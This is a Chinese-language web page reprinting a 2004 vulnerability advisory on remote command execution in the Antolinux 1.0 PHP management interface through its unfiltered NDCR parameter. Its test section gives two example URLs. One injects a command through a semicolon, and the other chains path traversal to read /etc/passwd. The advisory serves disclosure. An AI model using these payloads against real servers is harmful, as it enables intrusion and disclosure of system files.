您当前位置:设计在线网 >> Php >> 浏览文章

分解Antologic Antolinux管理接口NDCR参数远程命令执行漏洞

分享到:
本文章讲述了分解Antologic Antolinux管理接口NDCR参数远程命令执行漏洞.

息提供:

安全公告(或线索)提供热线:[email protected]m

漏洞类别:

远程命令执行漏洞

攻击类型:

远程攻击

发布日期:

2004-01-26

更新日期:

2004-02-04

受影响系统:

Antologic Antolinux 1.0

安全系统:

漏洞报告人:

Himeur Nourredine

漏洞描述:

BUGTRAQ  ID: 9495
Antologic Antolinux是一款linux服务程序,包含由PHP编写管理接口。
Antologic Antolinux管理接口对部分HTTP请求中的参数缺少充分过滤,远程攻击者可以利用这个漏洞以服务进程权限在系统上执行任意命令。
此管理接口主要对外部提供的'NDCR'参数缺少充分过滤,攻击者可以伪造HTTP REFERER提交恶意请求而以服务进程权限执行任意命令,不过此漏洞只有当sudo不启用的情况下才可利用。
 

测试方法:

警告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/dns/ndcr.php?NDCR=anything;[arbritary commands]
http://www.example.com/libs/calendrier.php?lng=../../../../../../../../../home/web/ISA/htdocs/wmi/dns/ndcr&NDCR=foo ;cat /etc/passwd > lostnoobs.txt
 

解决方法:

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.antolinux.net/
 

推荐阅读:
理解PHP基础知识:字符串搜索系列函数的实现
MySQL 25常用PHP函数 建立数据库连接
介绍apache隐藏、混淆php后缀名的3种方法
推荐文章  
赞助商链接  
热门排行  
主题推广  
中国设计在线网 All Rights Reserved. 互联网违法和不良信息举报
信息产业部备案号:湘ICP备09001063号